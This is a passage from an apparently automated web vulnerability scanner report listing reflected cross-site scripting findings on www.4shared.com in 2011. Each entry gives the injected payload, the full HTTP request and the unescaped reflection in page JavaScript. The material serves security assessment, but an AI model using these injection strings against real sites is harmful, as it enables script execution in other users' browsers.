Response

HTTP/1.1 404 /js/'%20+%20val%20+%20'a806a"-alert(1)-"8921d112299
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:19 GMT
Content-Length: 38649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/'%20+%20val%20+%20'a806a"-alert(1)-"8921d112299";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.64. http://www.4shared.com/js/Jsonp.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/Jsonp.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8619f'-alert(1)-'d5c040e7677 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js8619f'-alert(1)-'d5c040e7677/Jsonp.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js8619f'-alert(1)-'d5c040e7677/Jsonp.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:59:41 GMT
Content-Length: 38790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js8619f'-alert(1)-'d5c040e7677/Jsonp.js',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

func
...[SNIP]...

2.65. http://www.4shared.com/js/Jsonp.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/Jsonp.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e1ee"-alert(1)-"fd3838b98de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js6e1ee"-alert(1)-"fd3838b98de/Jsonp.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js6e1ee"-alert(1)-"fd3838b98de/Jsonp.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:59:38 GMT
Content-Length: 38796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js6e1ee"-alert(1)-"fd3838b98de/Jsonp.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.66. http://www.4shared.com/js/Jsonp.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/Jsonp.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6306"-alert(1)-"2b949987eec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/Jsonp.jsd6306"-alert(1)-"2b949987eec?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js/Jsonp.jsd6306"-alert(1)-"2b949987eec
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:04 GMT
Content-Length: 38795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/Jsonp.jsd6306"-alert(1)-"2b949987eec";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.67. http://www.4shared.com/js/Jsonp.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/Jsonp.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2b3b'-alert(1)-'5c843333b1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/Jsonp.jsb2b3b'-alert(1)-'5c843333b1c?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js/Jsonp.jsb2b3b'-alert(1)-'5c843333b1c
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:08 GMT
Content-Length: 38793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/Jsonp.jsb2b3b'-alert(1)-'5c843333b1c',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.68. http://www.4shared.com/js/UploadModule.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/UploadModule.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e57b"-alert(1)-"ca14281641e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js4e57b"-alert(1)-"ca14281641e/UploadModule.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js4e57b"-alert(1)-"ca14281641e/UploadModule.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:11 GMT
Content-Length: 38826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js4e57b"-alert(1)-"ca14281641e/UploadModule.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

2.69. http://www.4shared.com/js/UploadModule.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/UploadModule.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6c24'-alert(1)-'bf67b21616d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsa6c24'-alert(1)-'bf67b21616d/UploadModule.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /jsa6c24'-alert(1)-'bf67b21616d/UploadModule.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:14 GMT
Content-Length: 38648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jsa6c24'-alert(1)-'bf67b21616d/UploadModule.js',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

2.70. http://www.4shared.com/js/UploadModule.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/UploadModule.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40dac"-alert(1)-"83473083b8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/UploadModule.js40dac"-alert(1)-"83473083b8f?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js/UploadModule.js40dac"-alert(1)-"83473083b8f
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:25 GMT
Content-Length: 38649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/UploadModule.js40dac"-alert(1)-"83473083b8f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.71. http://www.4shared.com/js/UploadModule.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/UploadModule.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e48'-alert(1)-'75e7a4ce3cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/UploadModule.jsa7e48'-alert(1)-'75e7a4ce3cb?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js/UploadModule.jsa7e48'-alert(1)-'75e7a4ce3cb
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:28 GMT
Content-Length: 38653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/UploadModule.jsa7e48'-alert(1)-'75e7a4ce3cb',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.72. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bad43'-alert(1)-'fb83ad09a8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsbad43'-alert(1)-'fb83ad09a8e/account/AccountFacade.js?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsbad43'-alert(1)-'fb83ad09a8e/account/AccountFacade.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:25 GMT
Content-Length: 38846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jsbad43'-alert(1)-'fb83ad09a8e/account/AccountFacade.js',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

2.73. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a8ce"-alert(1)-"f6aca5d2241 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js8a8ce"-alert(1)-"f6aca5d2241/account/AccountFacade.js?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js8a8ce"-alert(1)-"f6aca5d2241/account/AccountFacade.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:22 GMT
Content-Length: 38851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js8a8ce"-alert(1)-"f6aca5d2241/account/AccountFacade.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fe
...[SNIP]...

2.74. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62407"-alert(1)-"c32d16a2212 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/account62407"-alert(1)-"c32d16a2212/AccountFacade.js?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/account62407"-alert(1)-"c32d16a2212/AccountFacade.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:38 GMT
Content-Length: 38850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/account62407"-alert(1)-"c32d16a2212/AccountFacade.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

2.75. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3f62'-alert(1)-'6724e48becf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/accounta3f62'-alert(1)-'6724e48becf/AccountFacade.js?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/accounta3f62'-alert(1)-'6724e48becf/AccountFacade.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:40 GMT
Content-Length: 38853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/accounta3f62'-alert(1)-'6724e48becf/AccountFacade.js',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}
...[SNIP]...

2.76. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25ce4'-alert(1)-'a8e30789091 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/account/AccountFacade.js25ce4'-alert(1)-'a8e30789091?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/account/AccountFacade.js25ce4'-alert(1)-'a8e30789091
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:55 GMT
Content-Length: 38850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/account/AccountFacade.js25ce4'-alert(1)-'a8e30789091',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.77. http://www.4shared.com/js/account/AccountFacade.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/account/AccountFacade.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd956"-alert(1)-"eb47d8a0cf1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/account/AccountFacade.jsbd956"-alert(1)-"eb47d8a0cf1?rnd=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/account/AccountFacade.jsbd956"-alert(1)-"eb47d8a0cf1
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:08:53 GMT
Content-Length: 38848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/account/AccountFacade.jsbd956"-alert(1)-"eb47d8a0cf1";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.78. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/homeScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99656'-alert(1)-'523266739b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js99656'-alert(1)-'523266739b1/homeScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js99656'-alert(1)-'523266739b1/homeScript.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:01 GMT
Content-Length: 38624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js99656'-alert(1)-'523266739b1/homeScript.jsp',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

2.79. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/homeScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 903c6"-alert(1)-"7ad83cf2909 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js903c6"-alert(1)-"7ad83cf2909/homeScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js903c6"-alert(1)-"7ad83cf2909/homeScript.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:10:59 GMT
Content-Length: 38802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
